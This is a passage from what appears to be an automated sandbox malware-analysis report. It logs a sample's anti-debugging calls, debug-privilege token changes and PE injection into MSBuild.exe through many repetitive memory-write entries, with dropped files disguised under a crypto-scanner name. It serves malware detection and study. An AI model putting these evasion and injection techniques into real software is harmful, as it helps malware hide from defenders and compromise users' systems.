                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,6_2_004062FC
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00745058 mov eax, dword ptr fs:[00000030h]28_2_00745058
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007820AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,28_2_007820AA
                  Source: C:\Users\user\Desktop\00000123.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00752992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00752992
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00740BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00740BAF
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00740D45 SetUnhandledExceptionFilter,28_2_00740D45
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00740F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00740F91
                  Source: C:\Users\user\Desktop\00000123.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340064Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13400C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134012CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340190Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13401F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340258Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13402BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340320Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340384Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13403E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134044CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13404B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340514Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340578Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13405DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340640Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13406A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340708Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134076CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13407D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340834Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340898Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13408FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340960Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13409C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340A28Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340A8CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340AF0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340B54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340BB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340C1CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340C80Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340CE4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340D48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340DACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340E10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340E74Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340ED8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340F3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340FA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341004Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341068Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13410CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341130Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341194Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13411F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134125CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13412C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341324Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341388Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13413ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341450Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13414B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341518Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134157CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13415E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341644Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13416A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134170CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341770Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13417D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341838Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134189CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341900Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341964Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13419C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341A2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341A90Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341AF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341B58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341BBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341C20Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341C84Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341CE8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341D4CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341DB0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341E14Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341E78Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341EDCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341F40Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341FA4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134206CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13420D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342134Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342198Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13421FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342260Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13422C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342328Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134238CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13423F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342454Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13424B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134251CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342580Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13425E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342648Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13426ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342710Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342774Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13427D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134283CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13428A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342904Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342968Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13429CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342A30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342A94Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342AF8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342B5CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342BC0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342C24Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342C88Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342CECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342D50Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342DB4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342E18Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342E7CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342EE0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342F44Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342FA8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134300CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343070Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13430D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343138Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134319CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343200Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343264Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13432C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134332CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343390Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13433F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343458Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13434BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343520Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343584Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13435E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134364CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13436B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343714Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343778Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13437DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343840Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13438A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343908Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134396CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13439D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343A34Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343A98Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343AFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343B60Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343BC4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343C28Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343C8CJump to behavior
